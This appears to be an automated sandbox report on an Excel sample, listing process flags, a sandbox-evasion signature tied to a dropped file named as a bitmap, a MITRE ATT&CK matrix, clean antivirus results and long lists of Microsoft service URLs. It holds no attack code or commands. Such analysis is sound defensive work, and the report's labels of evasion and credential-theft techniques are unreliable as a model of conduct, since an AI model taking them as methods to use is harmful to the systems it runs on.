    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: BBD11366.bmp.0.drBinary or memory string: ORIGINALFILENAMESNIFFER.EXEJ
    Source: BBD11366.bmp.0.drBinary or memory string: INTERNALNAMESNIFFER.EXE
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBD11366.bmpJump to dropped file

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading11OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerSystem Information Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBD11366.bmp0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
      high
      https://login.microsoftonline.com/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
        high
        https://shell.suite.office.com:1443D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
            high
            https://autodiscover-s.outlook.com/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                high
                https://cdn.entity.D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/queryD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                      high
                      https://powerlift.acompli.netD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                        high
                        https://cortana.aiD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                  high
                                  https://api.aadrm.com/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                        high
                                        https://cr.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControlD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/OfficeD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                              high
                                              https://graph.ppe.windows.netD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptioneventsD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.netD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplateD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplateD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetectD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.msD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groupsD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                              high
                                                              https://graph.windows.netD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/apiD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetectD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                      high
                                                                                      https://management.azure.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmediaD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.netD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policiesD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/importsD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v2D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/macD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.aiD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.comD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devicesD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.D0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
